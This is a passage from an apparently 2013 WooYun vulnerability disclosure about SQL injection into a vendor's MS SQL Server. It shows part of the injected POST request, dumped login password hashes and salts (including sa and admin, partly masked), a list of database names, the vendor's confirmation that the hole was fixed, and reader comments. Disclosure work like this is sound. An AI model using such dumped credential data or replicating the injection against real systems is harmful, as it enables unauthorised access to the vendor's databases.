pc3RTZXJpdmUkY3RsMDAkY2hrU2VsZWN0BSFycENtcG50TGlzdFNlcml2ZSRjdGwwMSRjaGtTZWxlY3QFIXJwQ21wbnRMaXN0U2VyaXZlJGN0bDAyJGNoa1NlbGVjdAUhcnBDbXBudExpc3RTZXJpdmUkY3RsMDMkY2hrU2VsZWN0G9QElKGWlxQQxGWPNi1684T2Mx6kv8U2K8Xb7qo67%2B0%3D&__EVENTVALIDATION=%2FwEWDQKZioz9CALEhISFCwKln%2FPuCgLXn6C%2FCAKy%2Fui0AwL29I3hBAKtrpq3CwKZoI7WDQKIjeOsBgLU4vHDAgK1maGbBALV7vWfDwKQhN7uB4RzJZ%2FabknILKzlkmB3qA9pheJ80Nv4AuIql%2BKD%2BHbb&__ASYNCPOST=true&btnSearch=%E6%90%9C%E7%B4%A2

漏洞证明:

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x0100c1939c2fc85b*******4e3ef65249d96027ea2407a5a
header: 0x0100
salt: c1939c2f
mixedcase: c85b857c74f3f834e3******96027ea2407a5a
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x010000b0718c4339aa59e3ca38f72de2eaf38dca88a57168a27a
header: 0x0100
salt: 00b0718c
mixedcase: 4339aa59e3ca38f72de2eaf38dca88a57168a27a
[*] admin [1]:
password hash: 0x010027bea6b7b5be9******b2d5bb671e80f47164364e561
header: 0x0100
salt: 27bea6b7
mixedcase: b5be9bd85ffd9abb******80f47164364e561
[*] macro [1]:
password hash: 0x0100132fbf05748d25******5fc2027e8fab85695210eda856
header: 0x0100
salt: 132fbf05
mixedcase: 748d253944dbd45fc2******85695210eda856
[*] OPEC [1]:
password hash: 0x01003da2cb2d309******e83b853dc18c0498c85dd1792c02b
header: 0x0100
salt: 3da2cb2d
mixedcase: 309185312f4e83b******498c85dd1792c02b
[*] sa [1]:
password hash: 0x01009c4ee991996******dea6d05454cace638a8709043eb
header: 0x0100
salt: 9c4ee991
mixedcase: 99647bf55c710dea******ce638a8709043eb


available databases [20]:
[*] DB_MessageCenter
[*] Doc**ench
[*] ES**
[*] Informatio**rtal
[*] KM2S**
[*] LogSe**rDB
[*] master
[*] model
[*] msdb
[*] OPE**EC
[*] OPE**SO
[*] Open**atform
[*] ReportServer
[*] ReportServerTempDB
[*] SND**ROCESS
[*] SND**ROCESS_DATA
[*] SN**eeting
[*] tempdb
[*] W**
[*] X**arch

修复方案:

各种系统,该下的就下吧。

版权声明:转载请注明来源 loli@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-05 22:38

厂商回复:

感谢提交漏洞

最新状态:

2013-11-12:漏洞已经修复,非常感谢白帽子的支持和鞭笞;我们对支持和帮助我们的白帽子准备了一些小礼物;请关注我们的微博http://weibo.com/VSRC;


漏洞评价:

评论

  1. 2013-12-10 16:22 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    你好,这个post注入电视怎么寻找的呢?从网上找了一些文章,看起来都挺乱的。。。

  2. 2013-12-10 16:23 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    注入点,见笑了

  3. 2013-12-10 16:33 | loli 认证白帽子 ( 普通白帽子 | Rank:550 漏洞数:52 )

    @默之 抓包

  4. 2013-12-10 16:59 | 默之 ( 普通白帽子 | Rank:334 漏洞数:67 | 沉淀。)

    @loli 能稍微详细点吗?怎么寻找到post注入点?谢谢

  5. 2014-04-18 15:19 | evil_webshell ( 路人 | Rank:0 漏洞数:2 | 致力于web层面的安全,热爱黑客技术,正在...)

    学习了,继续支持。

  6. 2014-10-11 18:50 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    我次奥!这地址你怎么挖出来的 - -